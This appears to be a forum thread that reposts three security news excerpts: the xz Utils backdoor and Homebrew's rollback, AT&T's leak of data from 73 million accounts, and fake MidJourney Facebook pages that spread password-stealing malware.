Several people, including two Ars readers, reported that the multiple apps included in the HomeBrew package manager for macOS rely on the backdoored 5.6.1 version of xz Utils. HomeBrew has now rolled back the utility to version 5.4.6. Maintainers have more details available here.

Targeting sshd

The first signs of the backdoor were introduced in a February 23 update that added obfuscated code, officials from Red Hat said in an email. An update the following day included a malicious install script that injected itself into functions used by sshd, the binary file that makes SSH work. The malicious code has resided only in the archived releases—known as tarballs—which are released upstream. So-called GIT code available in repositories aren’t affected, although they do contain second-stage artifacts allowing the injection during the build time. In the event the obfuscated code introduced on February 23 is present, the artifacts in the GIT version allow the backdoor to operate.

The malicious changes were submitted by JiaT75, one of the two main xz Utils developers with years of contributions to the project.



https://arstechnica.com/security/2024/0 ... nnections/

[RTH10260]

AT&T says personal information, data from 73 million accounts leaked onto dark web

MIKE SNIDER USA TODAY
2024-03-30

AT&T is investigating how tens of millions of former and current customers had their personal information leaked on the dark web earlier this month.

In addition to the 7.6 million current AT&T customers affected, the telecom giant said in an announcement Saturday about 65.4 million former customers "had some data released" within the data set, which "appears to be from 2019 or earlier."

Leaked onto the dark web two weeks ago, the data set had personal information including Social Security numbers and data from "AT&T data-specific fields." The "compromised data" does not contain personal financial information or call history, AT&T said.

The company is investigating the incident, but said "it is not yet known whether the data in those fields originated from AT&T or one of its vendors."

AT&T said it has contacted all 7.6 million current customers who were impacted and reset their passcodes after it learned "that a number of AT&T passcodes have been compromised," according to its note to customers.

The company will contact all current and past customers whose "sensitive personal information" was compromised and has launched "a robust investigation supported by internal and external cybersecurity experts."

Got a data breach alert?: Don't ignore it. Here's how to protect your information.

AT&T asks customers to 'remain vigilant' about their data following leak

Additionally, AT&T encouraged "customers to remain vigilant by monitoring account activity and credit reports" and included links to credit bureaus in its note to customers.

Tech news sites CNET and TechCrunch report the data stems from a 2021 breach that AT&T denied then. A portion of that data set appeared online at the time. Then earlier this week, the data set from that breach resurfaced and included sensitive information such as Social Security numbers, home addresses and names, the sites reported.




https://eu.usatoday.com/story/tech/2024 ... 156048007/

[RTH10260]

Fake Facebook MidJourney AI page promoted malware to 1.2 million people

By Bill Toulas
April 5, 2024 12:47 PM 0

Hackers are using Facebook advertisements and hijacked pages to promote fake Artificial Intelligence services, such as MidJourney, OpenAI's SORA and ChatGPT-5, and DALL-E, to infect unsuspecting users with password-stealing malware.

The malvertising campaigns are created by hijacked Facebook profiles that impersonate popular AI services, pretending to offer a sneak preview of new features.

Users tricked by the ads become members of fraudulent Facebook communities, where the threat actors post news, AI-generated images, and other related info to make the pages look legitimate.

However, the community posts often promote limited-time access to upcoming and eagerly anticipated AI services, tricking the users into downloading malicious executables that infect Windows computers with information-stealing malware, like Rilide, Vidar, IceRAT, and Nova.

Information-stealing malware focuses on stealing data from a victim's browser, including stored credentials, cookies, cryptocurrency wallet information, autocomplete data, and credit card information.

This data is then sold on dark web markets or used by the attackers to breach the target's online accounts to promote further scams or conduct fraud.

Midjourney campaign

The reach of those campaigns is staggering in some cases, as people's interest in AI is currently very high. The developments in the field are so rapid that it's not easy for people to keep up and discern legitimate announcements from obvious fakes.

In one of the cases seen by researchers at Bitdefender, a malicious Facebook page impersonating Midjourney amassed 1.2 million followers and remained active for nearly a year before it was eventually taken down.

The page wasn't created from scratch; instead, the attackers hijacked an existing profile in June 2023 and converted it to a fake Midjourney page. Facebook shut down the page on March 8, 2024.




https://www.bleepingcomputer.com/news/s ... on-people/